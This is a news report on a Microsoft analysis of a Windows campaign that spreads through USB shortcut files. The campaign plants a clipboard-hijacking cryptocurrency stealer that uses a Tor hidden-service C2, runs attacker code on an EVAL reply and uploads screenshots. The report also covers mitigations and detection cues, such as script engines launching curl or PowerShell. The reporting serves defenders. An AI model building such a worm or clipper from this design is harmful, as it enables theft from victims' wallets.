"The clipper in this campaign relies on Windows Script Host and ActiveX-driven logic to launch a bundled Tor proxy and poll a hidden-service C2 [command‑and‑control] server," the Microsoft Defender Security Research Team said in an analysis published Tuesday.
Scope and timeline: campaign active since February 2026
Microsoft disclosed that the Windows-based cryptocurrency clipper campaign has targeted users since February 2026. According to the Microsoft Defender Security Research Team, the operation combines a USB-delivered worm with a clipper stealer and a Tor-based command-and-control (C2) channel, enabling persistent, covert theft and occasional remote code execution.
USB LNK worm: how the infection begins
The attack chain begins with malicious Windows Shortcut (LNK) files distributed on USB storage devices. The LNK payload scans the removable drive for common document types such as DOC, XLSX, and PDF; it hides any found originals and creates new LNK files that use the same filenames but contain arguments that point to the worm component. When an unsuspecting user launches what appears to be a benign document shortcut, the worm component executes.
The worm checks whether the host is already infected and only fetches a remote payload if it is not present. It also propagates to other unattacked USB drives and deploys scheduled tasks as a form of persistence for both the worm component and the stealer component.
Tor-based C2 and persistent backdoor behavior
Rather than relying on exposed IP‑based C2 infrastructure, the malware deploys a portable Tor client and routes traffic through a local SOCKS5 proxy. Microsoft reported the malware launches a renamed Tor binary in a hidden window, generates a unique victim identifier, and registers that ID with an external server. After registration, the malware enters a continuous loop that periodically polls a hidden-service C2 server for instructions.
Microsoft described this design as blending "data theft with remote code execution, turning a financially motivated stealer into a lightweight backdoor." Notably, if the C2 responds with an EVAL response, the malware executes attacker-supplied code at runtime.
Clipper mechanics: clipboard monitoring, address substitution, and screenshots
The clipper uses Windows Script Host facilities—specifically WScript and ActiveXObject—to interact with the operating system. It monitors the clipboard at high frequency, checking for wallet seed phrases and private keys about every 500 milliseconds. When it detects cryptocurrency addresses that match known blockchain address patterns, the clipper substitutes them with attacker-controlled wallet values to reroute transactions.
In addition to clipboard theft and address hijacking, the malware uploads screenshots through Tor. As an evasion measure, the clipper exits if Task Manager is among the list of actively running processes.
Recommended mitigations from Microsoft
Microsoft urged defenders to prioritize behavioral detections over static signatures. The vendor specifically recommended looking for PowerShell‑based screen capture and the use of WScript, CScript, or related script engines to launch curl, cmd.exe, PowerShell, or unexpected executables.
Operational mitigations Microsoft listed include disabling AutoRun/AutoPlay for all removable media; blocking LNK execution from removable drives via Group Policy Objects (GPOs); restricting unnecessary use of wscript.exe or cscript.exe; and reviewing clipboard-related and screen‑capture behaviors on devices that handle sensitive financial workflows.
What this means for technologists, affected enterprises, and end users
- Technologists and security teams: Watch for behavioral indicators tied to WScript/ActiveX scripting, scheduled tasks sustaining both worm and stealer components, and unusual Tor processes launched in hidden windows. Prioritize detections that flag runtime execution of EVAL responses and PowerShell-based screen capture.
- Affected enterprises and procurement leaders: Enforce GPOs that block LNK execution from removable drives, disable AutoRun/AutoPlay on endpoints, and restrict use of script engines such as wscript.exe and cscript.exe on systems handling crypto or financial assets.
- End users and administrators of sensitive workflows: Treat USB drives with caution; be aware that seemingly familiar document shortcuts can be malicious, and review clipboard and screenshot behavior on machines used for cryptocurrency transactions.
The campaign Microsoft described combines a classic USB worm technique with modern anonymity and runtime flexibility: portable Tor and an EVAL-capable C2 make a clipboard stealer into a persistent backdoor capable of executing remote instructions. Defenders who default to signature-based controls and allow LNK execution from removable media will face an uphill fight; behavioral controls, endpoint policy hardening, and scrutiny of scripting engines are the concrete countermeasures the vendor recommends.
